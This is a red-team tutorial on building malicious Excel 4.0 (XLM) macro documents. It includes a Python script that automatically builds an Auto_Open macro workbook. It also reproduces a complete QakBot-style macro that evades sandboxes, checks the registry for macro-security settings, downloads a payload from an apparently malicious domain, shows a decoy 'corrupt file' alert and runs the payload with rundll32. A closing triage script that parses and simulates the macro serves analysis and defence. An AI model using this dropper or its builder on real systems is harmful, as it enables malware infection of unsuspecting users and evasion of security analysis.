# Weaponizing XLM 4.0 macros

XLM macros (Excel 4.0 macros) are part of the Microsoft Office suite and are an excellent resource for implementing an initial-foothold scenario that executes a payload during a red team exercise. This scenario is inspired by the following malware families, which abuse XLM macros to load their first stage into memory.

{% embed url="<https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot/#.YJQ_ibVKhPY>" %}

{% embed url="<https://seguranca-informatica.pt/flawedammyy-leveraging-undetected-xlm-macros-as-an-infection-vehicle/#.YJQ_wLVKhPb>" %}

## Playing with XLM Macros

To start this lab, the first step is to create the XLM macro sheet inside an Excel document.

**Right-click a sheet tab** / **Insert** / **MS Excel 4.0 Macro** / **OK**

After that, a new macro sheet is created, as shown below.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_2-EeKH4hRIQnV8Dko%2F-M_27lfnWJ_FqASjJnjJ%2Fa.gif?alt=media\&token=ed4fe74c-0f07-4e22-997d-462e8c974260)

As a first test, we can launch the calc.exe process when the macro runs.

```
=EXEC("calc.exe")
=HALT()
```

Note that we need to give cell `A1` the defined name `Auto_Open` (type it into the Name Box) if we want the macro to fire as soon as the document is opened:

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_28EczR7RR6j3N40v_%2F-M_29ceZ2IStcGvrcfVE%2Fimage.png?alt=media\&token=1de895bf-e0ad-4e85-aa48-9dfae08d3f5a)

After that, we can save our first PoC. Remember to save the document in a format that keeps macros, i.e. Excel 97-2003 Workbook (.xls) or Excel Macro-Enabled Workbook (.xlsm), selected from the file-type drop-down at the top of the save options.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_28EczR7RR6j3N40v_%2F-M_2AAT9D6_a2fgu1vwm%2Fimage.png?alt=media\&token=9ca43633-a4b9-4f75-8b46-c21c63a718c6)

As expected, calc.exe is launched when the Excel file is opened. :sunglasses:

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_28EczR7RR6j3N40v_%2F-M_2BM8jLxtXgveeRKO-%2Fimage.png?alt=media\&token=c3d3d94e-8fb9-454f-87e4-f8916ffeb1b3)
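
The same PoC can be produced without clicking through Excel. The script below is an added example for this page, not the page's own code: it drives Excel over COM (pywin32, so Windows with Excel installed) to add an Excel 4.0 macro sheet, fill column A with the formulas, define the `Auto_Open` name and save the workbook as a legacy .xls. The sheet name `Macro1`, the output path and the helper names are this example's assumptions; the COM members used (`Workbooks.Add`, `Excel4MacroSheets.Add`, `Names.Add`, `SaveAs` with `xlExcel8` = 56) come from the Excel object model.

```python
"""Build the calc.exe Auto_Open PoC from this page without the Excel GUI.

Added example, not the page's own code. Assumes Windows, Excel and pywin32
(win32com). The COM calls mirror the manual steps: insert an Excel 4.0 macro
sheet, fill column A, define Auto_Open, save as .xls.
"""

XL_EXCEL8 = 56            # XlFileFormat.xlExcel8: legacy BIFF8 .xls, which keeps XLM macro sheets
MACRO_SHEET = "Macro1"    # assumed sheet name (Excel's default for the first macro sheet)


def build_macro(formulas):
    """Lay the formulas out one per row in column A of the macro sheet.

    Returns (cells, auto_open_ref): a dict {"A1": formula, ...} and the
    RefersTo string for the Auto_Open defined name, which must point at the
    first formula so Excel runs the macro on open. The page's macro ends
    with =HALT(); that convention is enforced here so execution stops cleanly.
    """
    if not formulas:
        raise ValueError("no formulas given")
    if formulas[-1].strip().upper() != "=HALT()":
        raise ValueError("XLM macro must end with =HALT()")
    cells = {f"A{row}": f for row, f in enumerate(formulas, start=1)}
    return cells, f"={MACRO_SHEET}!$A$1"


def write_poc(path, formulas):
    """Drive Excel over COM to write the macro sheet and save the PoC as .xls."""
    import win32com.client  # imported here so build_macro() stays usable off Windows

    cells, auto_open_ref = build_macro(formulas)
    excel = win32com.client.Dispatch("Excel.Application")
    excel.Visible = False
    excel.DisplayAlerts = False                  # suppress "save in this format?" prompts
    try:
        wb = excel.Workbooks.Add()
        macro_sheet = wb.Excel4MacroSheets.Add()  # same as Insert > MS Excel 4.0 Macro
        macro_sheet.Name = MACRO_SHEET
        for addr, formula in cells.items():
            macro_sheet.Range(addr).Formula = formula
        wb.Names.Add("Auto_Open", auto_open_ref)  # same as typing Auto_Open in the Name Box for A1
        wb.SaveAs(path, XL_EXCEL8)
    finally:
        excel.Quit()


if __name__ == "__main__":
    # Assumed output path; opening the result launches calc.exe once macros are allowed.
    write_poc(r"C:\Users\Public\poc.xls", ['=EXEC("calc.exe")', "=HALT()"])
```

`build_macro()` is kept separate from the COM part so the cell layout and the `Auto_Open` reference can be checked on any machine; only `write_poc()` needs Excel.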

## **Weaponizing XLM macros**

For a more complex scenario, we can simply adopt the approach used by, for instance, the QakBot trojan.

```
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN("c:\users\public\1.reg")
=FPOS(R[-1]C, 215)
=FREAD(R[-2]C, 255)
=FCLOSE(R[-3]C)
=FILE.DELETE("c:\users\public\1.reg")
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
=CLOSE(FALSE)
```

The first two lines are the particular highlight. They are a sandbox-evasion (anti-analysis) technique used to identify whether the file is facing a human or a machine (a sandbox). The GET.WORKSPACE() function returns properties of the environment; each property is referenced by a number.

The documentation for the two properties checked is as follows:

* **19:** If a mouse is present, returns TRUE; otherwise, returns FALSE.
* **42:** If your computer is capable of playing sounds, returns TRUE; otherwise, returns FALSE.

When either property is FALSE, that is a fairly good indication that the macro is running inside a sandbox. Hence =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) means: if no mouse is present, close the workbook and never reach the malicious part of the macro. The third line applies the same idea to GET.WORKSPACE(1), the operating-environment string, bailing out unless it contains "Windows". This lets the sample evade dynamic analysis products that do not emulate these characteristics properly.

The rest of the macro keeps the same cautious pattern before doing anything noisy. It uses reg.exe to export the Excel Security key of the running Office version (GET.WORKSPACE(2) returns the version number) to c:\users\public\1.reg, reads 255 bytes from offset 215 of that file, deletes it, and closes the workbook if "0001" appears in the data. That key holds the VBAWarnings macro-security value, and a value of 1 (macros enabled without prompting) is typical of an analysis environment rather than a victim. Only then does it fetch the first stage with URLDownloadToFileA (retrying to a second path if the call returns an error), shows a decoy "corrupt workbook" ALERT to explain the blank document, and launches the download with rundll32.exe ...,DllRegisterServer. Note the R[-n]C references: in a macro sheet each formula's result is stored in its own cell, so =FPOS(R[-1]C, 215) reads the file handle that FOPEN returned one row above, and the "0001" check reads the FREAD result three rows above it.
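
To see how those gates behave without opening the workbook at all, here is an added example (not from the page or the QakBot sample): a small Python triage script that parses macro text like the block above, rewrites the R[-n]C relative references into absolute cells, tags the rows carrying the sandbox checks and the payload stages, and replays the GET.WORKSPACE() gates against a simulated environment. It goes a little beyond the page's explanation by covering all three gates, not only the first two. The regexes, tag names, the simulated OS string and the embedded sample (the page's macro with the download domain replaced by example.invalid) are this example's own assumptions.

```python
import re

# Constructed sample: the QakBot-style macro from the page, with the real
# download domain replaced by a placeholder. One formula per row, column A.
SAMPLE = r'''
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN("c:\users\public\1.reg")
=FPOS(R[-1]C, 215)
=FREAD(R[-2]C, 255)
=FCLOSE(R[-3]C)
=FILE.DELETE("c:\users\public\1.reg")
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://example.invalid/stage1","c:\Users\Public\csg75ef.html",0,0)
=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://example.invalid/stage1","c:\Users\Public\bwep5ef.html",0,0),)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
=CLOSE(FALSE)
'''

# Gate rows that close the workbook unless the environment looks like a real host
WORKSPACE_GATE = re.compile(r'^=IF\(GET\.WORKSPACE\((\d+)\),\s*,\s*CLOSE\(TRUE\)\)$')
OS_GATE = re.compile(r'^=IF\(ISNUMBER\(SEARCH\("([^"]+)",GET\.WORKSPACE\(1\)\)\),\s*,\s*CLOSE\(TRUE\)\)$')
REL_REF = re.compile(r'R\[(-?\d+)\]C')   # R1C1 relative reference within the same column

# Crude indicators for the payload stages (assumed tag names); dict order = tag order
INDICATORS = {
    "exec": re.compile(r'^=EXEC\(|"ShellExecuteA"', re.I),
    "download": re.compile(r'"URLDownloadToFileA"', re.I),
    "registry-export": re.compile(r'reg\.exe","EXPORT', re.I),
    "rundll32": re.compile(r'rundll32\.exe', re.I),
    "file-io": re.compile(r'^=(FOPEN|FREAD|FPOS|FCLOSE|FILE\.DELETE)\(', re.I),
    "decoy-alert": re.compile(r'^=ALERT\(', re.I),
    "conditional-bailout": re.compile(r'^=IF\(.*CLOSE\(', re.I),
}


def parse_macro(text):
    """Split macro text into (row, formula) pairs; row N corresponds to cell A<N>."""
    rows = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    return list(enumerate(rows, start=1))


def resolve_relative_refs(row, formula):
    """Rewrite R[-n]C references into the A1-style cell they point at.

    Each formula's result lives in its own cell, so =FPOS(R[-1]C, 215) on
    row 7 reads the file handle that FOPEN stored in A6.
    """
    return REL_REF.sub(lambda m: f"A{row + int(m.group(1))}", formula)


def scan(text):
    """Return [(row, [tags], formula_with_absolute_refs)] for rows worth a look."""
    findings = []
    for row, formula in parse_macro(text):
        resolved = resolve_relative_refs(row, formula)
        if WORKSPACE_GATE.match(formula) or OS_GATE.match(formula):
            findings.append((row, ["sandbox-check"], resolved))
            continue
        tags = [tag for tag, pat in INDICATORS.items() if pat.search(formula)]
        if tags:
            findings.append((row, tags, resolved))
    return findings


def simulate_gates(text, workspace):
    """Replay the GET.WORKSPACE() gates against a simulated environment.

    `workspace` maps property number -> value, e.g. {19: True, 42: True,
    1: "Windows (64-bit) NT 10.00"} (the OS string is a constructed value).
    Returns the row at which the macro would CLOSE(TRUE), or None when every
    gate passes and execution reaches the payload rows.
    """
    for row, formula in parse_macro(text):
        m = WORKSPACE_GATE.match(formula)
        if m and not workspace.get(int(m.group(1)), False):
            return row
        m = OS_GATE.match(formula)
        if m and m.group(1).lower() not in str(workspace.get(1, "")).lower():
            return row
    return None


if __name__ == "__main__":
    for row, tags, formula in scan(SAMPLE):
        print(f"A{row:<3} {','.join(tags):<22} {formula[:70]}")
    # A sandbox with no mouse never gets past the first row.
    print("bails at row:", simulate_gates(SAMPLE, {19: False, 42: True, 1: "Windows (64-bit) NT 10.00"}))
```

Run as-is it prints the tagged rows with absolute cell references, which makes the FOPEN/FPOS/FREAD chain and the "0001" check on the FREAD result readable at a glance, and then shows that a mouse-less sandbox bails at row 1. Feeding `simulate_gates()` a fully "human" environment returns None, which is the configuration a sandbox needs to emulate to see the download and the rundll32 launch.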

{% embed url="<https://github.com/FortyNorthSecurity/EXCELntDonut>" %}
